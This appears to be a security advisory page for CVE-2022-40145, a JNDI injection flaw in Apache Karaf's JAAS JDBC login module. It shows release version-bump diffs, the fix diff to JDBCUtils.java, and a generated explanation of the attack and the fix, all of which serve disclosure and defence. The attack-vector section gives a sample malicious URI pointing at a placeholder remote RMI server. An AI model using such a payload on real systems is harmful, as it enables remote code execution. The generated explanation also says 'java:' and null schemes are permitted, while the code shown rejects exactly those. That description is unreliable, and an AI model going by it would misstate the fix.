examples/karaf-soap-example/karaf-soap-example-scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-soap-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-soap-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-url-namespace-handler-example/karaf-url-namespace-handler-example-core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-url-namespace-handler-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-url-namespace-handler-example/karaf-url-namespace-handler-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-url-namespace-handler-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-url-namespace-handler-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-war-example/karaf-war-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-war-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-war-example/karaf-war-example-webapp/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-war-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-war-example/pom.xml+1 −1 modified@@ -25,7 +25,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-websocket-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
features/command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.features</groupId> <artifactId>features</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
features/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.features</groupId> <artifactId>features</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
features/extension/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.features</groupId> <artifactId>features</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
http/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
instance/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
itests/common/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.itests</groupId> <artifactId>itests</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
itests/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
itests/test/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.itests</groupId> <artifactId>itests</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/blueprint/config/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas.blueprint</groupId> <artifactId>blueprint</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/blueprint/jasypt/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas.blueprint</groupId> <artifactId>blueprint</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/boot/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>jaas</artifactId> <groupId>org.apache.karaf.jaas</groupId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/config/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/jasypt/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/modules/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/spring-security-crypto/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jdbc/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jms/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
jndi/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
kar/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
log/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
main/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
management/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
management/server/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.management</groupId> <artifactId>management</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
manual/pom.xml+1 −1 modified@@ -17,7 +17,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
maven/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../../pom.xml</relativePath> </parent>
maven/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
obr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
package/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
pom.xml+2 −2 modified@@ -31,7 +31,7 @@ <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> <packaging>pom</packaging> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <name>Apache Karaf</name> <inceptionYear>2007</inceptionYear> @@ -84,7 +84,7 @@ <connection>${scm.connection}</connection> <developerConnection>${scm.developerConnection}</developerConnection> <url>${scm.url}</url> - <tag>HEAD</tag> + <tag>karaf-4.4.2</tag> </scm> <distributionManagement>
profile/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
scheduler/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
scr/management/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.scr</groupId> <artifactId>scr</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
scr/state/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.scr</groupId> <artifactId>scr</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
service/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.service</groupId> <artifactId>service</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
service/guard/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.service</groupId> <artifactId>service</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
service/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
services/coordinator/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf</artifactId> <groupId>org.apache.karaf</groupId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../../pom.xml</relativePath> </parent>
services/eventadmin/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf</artifactId> <groupId>org.apache.karaf</groupId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../../pom.xml</relativePath> </parent>
services/interceptor/api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.services</groupId> <artifactId>org.apache.karaf.services.interceptor</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
services/interceptor/impl/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.services</groupId> <artifactId>org.apache.karaf.services.interceptor</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
services/interceptor/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.services</groupId> <artifactId>services</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
services/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
services/staticcm/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf</artifactId> <groupId>org.apache.karaf</groupId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../../pom.xml</relativePath> </parent>
shell/commands/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.shell</groupId> <artifactId>shell</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
shell/console/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.shell</groupId> <artifactId>shell</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
shell/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.shell</groupId> <artifactId>shell</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
shell/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
shell/ssh/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.shell</groupId> <artifactId>shell</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
shell/table/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.shell</groupId> <artifactId>shell</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
specs/activator/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.specs</groupId> <artifactId>specs</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> </parent> <artifactId>org.apache.karaf.specs.activator</artifactId>
specs/java.xml/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.specs</groupId> <artifactId>specs</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> </parent> <artifactId>org.apache.karaf.specs.java.xml</artifactId>
specs/java.xml.ws/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.specs</groupId> <artifactId>specs</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> </parent> <artifactId>org.apache.karaf.specs.java.xml.ws</artifactId>
specs/locator/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.specs</groupId> <artifactId>specs</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> </parent> <artifactId>org.apache.karaf.specs.locator</artifactId>
specs/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
subsystem/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> </parent> <groupId>org.apache.karaf.subsystem</groupId>
system/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
tooling/karaf-maven-plugin/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.tooling</groupId> <artifactId>tooling</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
tooling/karaf-services-maven-plugin/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.tooling</groupId> <artifactId>tooling</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
tooling/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
tooling/utils/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.tooling</groupId> <artifactId>tooling</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> </parent> <artifactId>org.apache.karaf.tools.utils</artifactId>
util/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/console/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.webconsole</groupId> <artifactId>webconsole</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.webconsole</groupId> <artifactId>webconsole</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/gogo/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.webconsole</groupId> <artifactId>webconsole</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/http/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.webconsole</groupId> <artifactId>webconsole</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/instance/pom.xml+1 −1 modified@@ -19,7 +19,7 @@ <parent> <groupId>org.apache.karaf.webconsole</groupId> <artifactId>webconsole</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
web/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
wrapper/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
581fec474ca0Merge pull request #1632 from jbonofre/KARAF-7568
2 files changed · +16 −0
jaas/modules/src/main/java/org/apache/karaf/jaas/modules/jdbc/JDBCUtils.java+8 −0 modified@@ -15,6 +15,8 @@ */ package org.apache.karaf.jaas.modules.jdbc; +import java.net.URI; +import java.net.URISyntaxException; import java.sql.Connection; import java.sql.PreparedStatement; import java.sql.ResultSet; @@ -58,6 +60,12 @@ protected static Object doCreateDatasource(BundleContext bc, String url) throws throw new Exception("Illegal datasource url format. Datasource URL cannot be null or empty."); } else if (url.startsWith(JNDI)) { String jndiName = url.substring(JNDI.length()); + // secure JNDI scheme + URI uri = new URI(jndiName); + String scheme = uri.getScheme(); + if (scheme == null || scheme.equals("java")) { + throw new Exception("Unsupported JNDI URI: " + jndiName); + } InitialContext ic = new InitialContext(); try { return ic.lookup(jndiName);
jaas/modules/src/main/java/org/apache/karaf/jaas/modules/jdbc/JDBCUtils.java+8 −0 modified@@ -15,6 +15,8 @@ */ package org.apache.karaf.jaas.modules.jdbc; +import java.net.URI; +import java.net.URISyntaxException; import java.sql.Connection; import java.sql.PreparedStatement; import java.sql.ResultSet; @@ -58,6 +60,12 @@ protected static Object doCreateDatasource(BundleContext bc, String url) throws throw new Exception("Illegal datasource url format. Datasource URL cannot be null or empty."); } else if (url.startsWith(JNDI)) { String jndiName = url.substring(JNDI.length()); + // secure JNDI scheme + URI uri = new URI(jndiName); + String scheme = uri.getScheme(); + if (scheme == null || scheme.equals("java")) { + throw new Exception("Unsupported JNDI URI: " + jndiName); + } InitialContext ic = new InitialContext(); try { return ic.lookup(jndiName);
Vulnerability mechanics
Root cause
"Missing validation of JNDI URI scheme in JDBCUtils.doCreateDatasource allows an attacker-controlled LDAP/RMI URL to be passed to InitialContext.lookup(), enabling remote code injection."
Attack vector
An attacker who can control the target LDAP server and influence the JDBC JNDI data source URL can inject a malicious URI such as `jndi:rmi://x.x.x.x:xxxx/Command` instead of the expected `osgi:` or `java:` scheme. The vulnerable code in `JDBCUtils.doCreateDatasource` [patch_id=1641298] passes the JNDI name directly to `InitialContext.lookup()` without validating the URI scheme. When the Karaf JAAS JDBC login module processes this URL, the JNDI lookup resolves the attacker-controlled remote object, leading to remote code execution. The attack requires the ability to modify the `DATASOURCE` option in the JDBC login module configuration.
Affected code
The vulnerable code is in `jaas/modules/src/main/java/org/apache/karaf/jaas/modules/jdbc/JDBCUtils.java`, specifically the `doCreateDatasource` method. This method calls `InitialContext.lookup(jndiName)` without any validation of the JNDI URI scheme, allowing arbitrary JNDI protocols (e.g., `rmi:`, `ldap:`) to be used [patch_id=1641298].
What the fix does
The patch [patch_id=1641298] adds URI scheme validation in `JDBCUtils.doCreateDatasource` before the JNDI lookup is performed. After extracting the JNDI name from the URL, the code now parses it as a `URI` and checks the scheme. Only the `java:` scheme (or a null scheme) is permitted; any other scheme such as `rmi:`, `ldap:`, or `ldaps:` causes an exception to be thrown with the message "Unsupported JNDI URI". This closes the code injection vector by preventing the attacker from supplying a remote JNDI reference that points to an attacker-controlled LDAP or RMI server.
Preconditions
- configThe Karaf JAAS JDBC login module must be configured with a JNDI data source URL.
- inputThe attacker must be able to control or modify the DATASOURCE option value in the JDBC login module configuration.
- networkThe attacker must control a remote LDAP or RMI server that serves a malicious object to the victim's JNDI lookup.
Generated on May 23, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
7- github.com/advisories/GHSA-c2p4-8mvv-rwmvghsaADVISORY
- karaf.apache.org/security/cve-2022-40145.txtghsavendor-advisoryWEB
- nvd.nist.gov/vuln/detail/CVE-2022-40145ghsaADVISORY
- gitbox.apache.org/repos/asfghsaWEB
- gitbox.apache.org/repos/asfghsaWEB
- github.com/apache/karaf/pull/1632ghsaWEB
- issues.apache.org/jira/browse/KARAF-7568ghsaWEB
News mentions
0No linked articles in our index yet.